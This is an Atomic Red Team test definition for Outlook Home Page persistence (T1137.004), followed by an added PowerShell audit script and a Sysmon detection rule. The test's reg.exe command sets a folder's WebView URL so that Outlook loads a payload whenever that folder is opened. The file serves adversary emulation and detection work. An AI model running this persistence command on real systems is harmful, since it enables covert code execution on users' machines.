atomic-red-team/atomics/T1137.004/T1137.004.yaml
Josh Rickard 284886292b Atomic Red Team - JSON Schema Validation CI (#2303)
* feat: Adding atomic-red-team JSON Schema definitions

* feat: Adding validate.py script to validate all atomics against the defined schema

* feat: Adding validate-schema GitHub Workflow action to validate on every push to the repo

* ci: Updated the validate-schema workflow to support and use Ruby instead of python

* fix: Updated schema to remove schema draft version (not necessarily needed) and update to remove elevation_required as a required defined property

* fix: Removed the yaml schema version

* docs: Adding start of README

* fix: Adding an updated/better version of the python validation but may ultimately be removed

* feat: Adding Ruby version of validate.rb script

* fix: Removing files not needed since we are changing to github action and using the new validation code

* fix: Adding the yaml schema file back and removed the json version

* docs: Updated README with documentation

* fix: Updating schema to use new format validator

* fix: Updated validate.rb to verify that the Technique IDs are in the correct format.

* fix: Updating validate.rb to raise exceptions so that failures flow up to the GitHub Action workflow

* fix: Updated all tests that have input_arguments not conforming to schema definition for type value of path

* fix: Updating the Validation README for typos

* fix: Minor updates to the schema

* minor schema changes

* github actions fix

* schema changes

---------

Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Co-authored-by: Hare Sudhan <code@0x6c.dev>
2023-05-12 15:33:47 -06:00

39 lines, 1.7 KiB, YAML

attack_technique: T1137.004
display_name: "Office Application Startup: Outlook Home Page"
atomic_tests:
- name: Install Outlook Home Page Persistence
  auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e
  description: |
    This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve a URL containing a malicious payload every time the targeted folder is viewed.
    Triggering the payload requires manually opening Outlook and viewing the targeted folder (e.g. Inbox).
  supported_platforms:
  - windows
  input_arguments:
    url:
      description: URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://)
      type: string
      default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html
    outlook_version:
      description: Version of Outlook that is installed
      type: float
      default: 16.0
      # Microsoft 365: 16.0
      # Outlook 2019: 16.0
      # Outlook 2016: 16.0
      # Outlook 2013: 15.0
    outlook_folder:
      description: Name of the Outlook folder to modify the homepage setting for
      type: string
      default: Inbox
      # Default folder names as they appear in the registry: https://support.microsoft.com/en-us/office/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04
  executor:
    name: command_prompt
    elevation_required: false
    command: |
      reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
    cleanup_command: |
      reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1
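The test above writes a single `URL` value under `HKCU\Software\Microsoft\Office\<version>\Outlook\WebView\<folder>`. The following audit script is an added example, not code from the Atomic Red Team project: it enumerates every Office version and folder key under that path for the current user, reports each folder that has a home page URL set, and can optionally remove values that are not on an allow-list. The function name `Get-OutlookHomePageSetting` and its `-AllowedUrl` and `-Remove` parameters are this example's own choices, not anything defined by the project.

```powershell
<#
Added example (not part of the Atomic Red Team project): audit the per-folder
Outlook Home Page setting that T1137.004 modifies. Walks every
HKCU\Software\Microsoft\Office\<version>\Outlook\WebView\<folder> key, reports
any folder whose URL value is populated, and optionally removes values that are
not on an allow-list. Function and parameter names are hypothetical.
#>

function Get-OutlookHomePageSetting {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        # Hypothetical allow-list of home page URLs the organisation deploys on purpose.
        [string[]] $AllowedUrl = @(),

        # Remove URL values that are not on the allow-list (honours -WhatIf / -Confirm).
        [switch] $Remove
    )

    # The wildcard matches every installed Office version (15.0, 16.0, ...);
    # Get-ChildItem then returns the per-folder subkeys of each WebView key.
    $folderKeys = Get-ChildItem -Path 'HKCU:\Software\Microsoft\Office\*\Outlook\WebView' `
                                -ErrorAction SilentlyContinue

    foreach ($key in $folderKeys) {
        $url = $key.GetValue('URL')
        if ([string]::IsNullOrWhiteSpace($url)) { continue }   # no home page set for this folder

        # Key name looks like HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\WebView\Inbox
        $parts      = $key.Name -split '\\'
        $suspicious = -not ($AllowedUrl -contains $url)

        [pscustomobject]@{
            OfficeVersion = $parts[4]
            Folder        = $key.PSChildName
            Url           = $url
            Allowed       = -not $suspicious
            RegistryKey   = $key.Name
        }

        if ($Remove -and $suspicious -and $PSCmdlet.ShouldProcess($key.Name, 'Remove URL value')) {
            # Mirrors the test's cleanup_command: only the URL value is deleted,
            # the folder key itself is left in place.
            Remove-ItemProperty -Path $key.PSPath -Name 'URL'
        }
    }
}

# Report only (run as the user whose profile is being inspected; the keys live under HKCU):
Get-OutlookHomePageSetting | Format-Table -AutoSize

# Dry run of remediation against a hypothetical allow-list; nothing is deleted with -WhatIf:
# Get-OutlookHomePageSetting -AllowedUrl 'https://intranet.example/outlook-home' -Remove -WhatIf
```

Because the setting is per user, the script only sees the hive of the account it runs under; inspecting other profiles means loading their `NTUSER.DAT` hives or walking `HKEY_USERS` instead. For continuous detection rather than a one-off audit, a Sysmon registry value-set rule (Event ID 13) on a `TargetObject` containing `\Outlook\WebView\` and ending in `\URL` catches the same write that the test's `reg.exe add` performs.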